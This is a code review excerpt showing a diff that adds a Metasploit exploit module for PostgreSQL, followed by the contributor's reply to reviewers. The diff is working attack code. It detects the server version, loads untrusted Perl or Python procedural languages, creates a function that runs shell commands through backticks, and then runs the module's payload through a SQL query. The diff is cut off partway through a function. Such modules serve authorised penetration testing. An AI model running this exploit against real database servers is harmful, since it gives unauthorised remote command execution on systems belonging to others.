modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,274 @@
+      print_error 'Connection failed.'
+      return
+
+    else
+      print_status "#{rhost}:#{rport} - #{version}"
+    end
+
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    major_version = version_match['major_version']
+    extension = 'LANGUAGE'
+
+    if major_version.to_i == 8
+      print_status 'Selecting version 8 payload'
+      extension = 'LANGUAGE'
+
+    elsif major_version.to_i >= 9
+      print_status 'Selecting version 9 payload'
+      extension = 'EXTENSION'
+
+    else
+      print_error 'Unsupported version - exploit failed'
+      return false
+    end
+
+    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+
+    # Attack!
+    begin
+      func_name = Rex::Text.rand_text_alpha(10)
+
+      languages = %w(perl python python2 python3)
+      loaded = false
+
+      languages.each do |language|
+        load_lang = create_language(language, extension)
+        human_language = language.capitalize.to_s
+
+        print_status "Attempting to load #{human_language}"
+
+        case load_lang
+        when 'exists'
+          print_good "#{human_language} is already loaded, continuing"
+          create_function(language, func_name)
+          loaded = true
+
+        when 'loaded'
+          print_good "#{human_language} was successfully loaded, continuing"
+          create_function(language, func_name)
+          loaded = true
+
+        when 'not_exists'
+          print_status "#{human_language} could not be loaded"
+
+        else
+          print_error 'No exploit path found'
+          return false
+        end
+
+        break if loaded
+      end
+
+      if loaded
+        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+        case select_query.keys[0]
+        when :conn_error
+          print_error "#{rhost}:#{rport} Postgres - Authentication failure, could not connect."
+
+        when :sql_error
+          print_error "Exploit failed"
+          return false
+
+        when :complete
+          print_good 'Starting payload'
+        end
+
+      else
+        return false
+      end
+
+    rescue RuntimeError => e
+      print_error "Failed to create UDF: #{e.class}: #{e}"
+    end
+
+    postgres_logout if @postgres_conn
+  end
+
+  def create_function(language, func_name)
+    load_func = ''
+
+    case language
+    when 'perl'
+      load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+        "`$_[0]`;" \
+        "$$ LANGUAGE pl#{language}u")
+
+    # Ruby doesn't do case folding ... :/
+    when 'python'
```

Comment:
Thanks. I'm pretty new to Ruby. Other languages I'd just collapse the cases/whens, but Ruby didn't like it when I did that. I found the regex today and was going to fix that. I'm working on the other recommendations and will have the push in a few. :)